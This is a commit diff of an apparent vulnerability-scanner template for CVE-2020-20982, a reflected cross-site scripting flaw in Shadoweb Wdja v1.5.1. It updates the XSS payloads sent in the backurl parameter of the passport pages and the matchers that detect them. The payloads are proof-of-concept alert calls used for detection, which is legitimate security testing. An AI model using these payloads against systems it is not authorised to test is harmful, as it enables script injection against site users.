Update CVE-2020-20982.yaml
parent
8463cfd824
commit
1c569d76cb
|
@ -4,23 +4,23 @@ info:
|
|||
name: Shadoweb Wdja v1.5.1 xss
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
tags: cve,cve2020,xss,wdja
|
||||
reference:
|
||||
- https://github.com/shadoweb/wdja/issues/1
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-20982
|
||||
tags: cve,cve2020,xss,wdja,shadoweb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=';alert(document.domain);//"
|
||||
- "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=';alert(document.domain);//"
|
||||
- "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- 'alert(document.domain);//'
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
Loading…
Reference in New Issue